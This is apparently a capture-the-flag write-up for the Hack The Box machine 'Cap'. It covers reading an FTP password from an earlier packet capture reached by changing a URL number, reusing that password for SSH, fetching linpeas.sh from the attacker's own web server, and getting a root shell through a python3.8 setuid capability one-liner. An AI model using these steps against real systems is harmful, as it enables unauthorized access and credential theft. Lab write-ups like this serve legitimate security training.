Cap writeup HTB

Cap

An easy box on web analysis using the Wireshark tool as well as a linux privilege escalation regarding capabilities.

Discovery

Let’s run an nmap scan with: nmap -sV -sC -T4 <IP>

The ftp server on port 21 doesn’t allow anonymous access, which leaves us with an http server on port 80 to check out.

Web server (gunicorn)

Typing the ip address into our browser immediately brings us to a website. It appears we’re already in the dashboard area of the web site, as a user called nathan :  

We have 3 options here. The IP Config option shows the IP configuration setup. The Network Status portion shows the active internet connections running. The third option, the security snapshot, is much more interesting. It analyses the traffic sent to the network returns it to us under a PCAP (Packet capture) file. We can use the network traffic tool Wireshark to open this file. We know this analysis works, since sending pings to the specific IP address shows up in the PCAP file to download :

This is important because since the web server is running on HTTP, the requests and the responses made over the network won’t be encrypted and therefore will be readable by us. This can be done by right-clicking on any request/response in the document and click follow in the options. If someone tried to login somewhere, like in that ftp server on port 21, that request would probably be available for us to read without any encryption. This means we would have clear-text access to a password. 

Shell as nathan

So how do we capture such a request? Well… we can’t. You see, the capture would have to already have been made while a user logged in. The only traffic we can record comes from our interactions with the network. Keeping that in mind, let’s take a closer look at what happens on the website after the security scan :

For each scan, the website adds a number (the file’s name) in the data directory to keep track of the scans. Since this was my second scan, I’m redirected to the data/2 page with the details of that specific scan. If I change the number in the url bar to 1 instead of 2, I would see the details of my first scan. 

See where I’m going with this? If I’m looking for a scan that’s already been made, I can return to it by typing its number in the url. What happens if we type 0 in the url instead of 1? Would that return us a scan made before the first one?

It looks like we found a previous scan to ours! Let’s open it up in Wireshark and follow the TCP streams of the FTP requests/responses :

Just as we predicted. Or maybe I made that prediction up after solving the machine. I guess you’ll never know. Anyway, with the password for the nathan user, we can go ahead and login into the ftp server. But before doing that, I want to try and use that password for something more important, like access to SSH. 

SSH (Secure Shell) is a protocol used to manage a network in a secure fashion over an otherwise unsecure fashion. Basically, having access to SSH means total control : command execution, managing services, creating and deleting users, etc (with root privileges). The command is :

ssh nathan@<IP>

And typing the password found when prompted.

And it works! We now have shell access as the user nathan. The next step is to elevate our position to root in order to have access and power over more things.

 

Privilege escalation

One of the first things I like to do when trying to elevate privileges is to upload and use a privilege escalation script on the target machine. Because I’m lazy, and also because it’s going to save you so much time especially on these easier machines. I’ll be using Linpeas for this. 

python -m SimpleHTTPServer <PORT> –> Start a local python web server to retrieve files from

wget http://<IP(local)>:<PORT>/linpeas.sh –> Download Linpeas from our server on the target machine

chmod +x linpeas.sh –> Make the script executable 

./linpeas.sh –> Run the script

The script picks something interesting up and lets us know it might be exploitable by making it yellow :

Linux capabilities are divisions of the root’s privilege maintained by the kernel. For example, we want a specific process to access a certain thing, but not to give full permissions as this can lead to security issues. Instead, we give that process a capability of performing an action with privilege. Capabilities fonctions are similar to SUIDs. Anyway, the executable python3.8 has the SETUID capability, which means it can manipulate user UIDs. A quick search for linux capabilities privilege escalations leads me to https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/, which details an almost identical situation as the one we’re in. We could also go on https://gtfobins.github.io/gtfobins/python/

In both case, we need to run the python executable in a way that manipulates its own UID to root’s UID (or something?):

./python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'